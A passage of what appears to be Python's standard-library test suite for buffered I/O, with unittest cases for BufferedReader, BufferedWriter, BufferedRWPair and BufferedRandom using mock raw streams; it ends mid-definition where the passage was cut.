def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so
        # checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill the file with some data
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After the write, write_pos and write_end are set to 0
f.read(1)
# The read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
